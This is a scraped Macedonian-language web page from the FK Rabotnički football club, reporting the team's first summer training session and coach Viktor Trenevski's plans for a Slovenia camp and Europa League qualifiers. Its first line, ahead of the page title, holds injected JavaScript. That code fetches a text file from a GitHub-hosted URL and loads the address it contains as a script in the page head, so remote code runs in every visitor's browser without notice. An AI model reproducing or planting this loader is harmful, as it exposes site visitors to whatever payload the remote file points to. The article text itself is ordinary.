;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Европа не смее да чека, Работнички тргна со летни подготовки
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Европа не смее да чека, Работнички тргна со летни подготовки

Со денешниот прв тренинг на стадионот во „Градски парк“ и официјално беше означен стартот на подготовките за новата сезона на Работнички. Тренерот Виктор Треневски на оваа прва прозивка не можеше да смета на дел од фудбалерите кои настапуваат за националните селекции, но очекува комплетирање на тимот пред заминувањето на мини-подготовки во Словенија, закажано за 12 јуни.

Ние практично немавме одмор, јас не стигнав ни дома да заминам „од таа страна“. Не сме комплетни, ни недостигаат десетина фудбалери кои се дел од сениорската и од младинската репрезентација, ги очекуваме браќата Сахити да ни се приклучат во текот на денешниот ден. Бојан Најденов се јави и најави дека ќе задоцни еден ден. Официјалниот старт на подготовките е денеска, но моја желба е да се комплетираме до заминувањето за Словенија. Нема некоја филозофија, наша цел е да видиме до каде сме со формата за да се подготвиме што подобро за европските купови. На 19 јуни е ждрепката кога ќе го дознаеме противникот, по што многу ќе можеме да говориме многу поконкретно. Верувам дека максимално подготвени ќе влеземе во тие натпревари и ќе го оправдаме името Работнички и традицијата на успешни настапии на овој клуб во Европа“ – истакнува Треневски.

Амбициозниот стратег најавува дека фокусот во овие подготовки ќе биде ставен врз воигрување на тактички план, се со цел да се мине најмалку едно коло од квалификациите за Лигата на Европа.

„Немаме премногу време за некои базични подготовки и затоа ќе се фокусираме само на воигрување. Од тие причини инсистирам само на две контролни средби додека сме во Словенија, за да влеземе во натпреварувачки ритам пред почетокот на европската авантура. Заминуваме во база што му е позната на овој клуб, ќе имаме добри услови за работа и се надевам дека колку што околностите ќе дозволуваат, ние ќе бидеме подготвени за првиот европски меч. Целта е да не се повтори ланскиот неуспех и раната елиминација од Будуќност. Ние нашата цел ја остваривме со самиот излез во Европа, и со тоа си го олеснивме буџетот за следната сезона. Што понатаму ќе зависи од многу работи, ќе зборувам поконкретно кога ќе го дознаеме името на противникот. Во секој случај, целта е да се помине најмалку едно коло во Европа“ – порачува Треневски.

На денешниот тренинг на „романтичарите“ се појави засилувањето од Ренова, Стојанче Велинов, како и Енис Дервиши од Шкендија, кој исто така ќе биде освежување за играчкиот кадар на Работнички за следната натпреварувачка сезона.

rab-08-06-27

rab-08-06-23

rab-08-06-19

rab-08-06-20

rab-08-06-18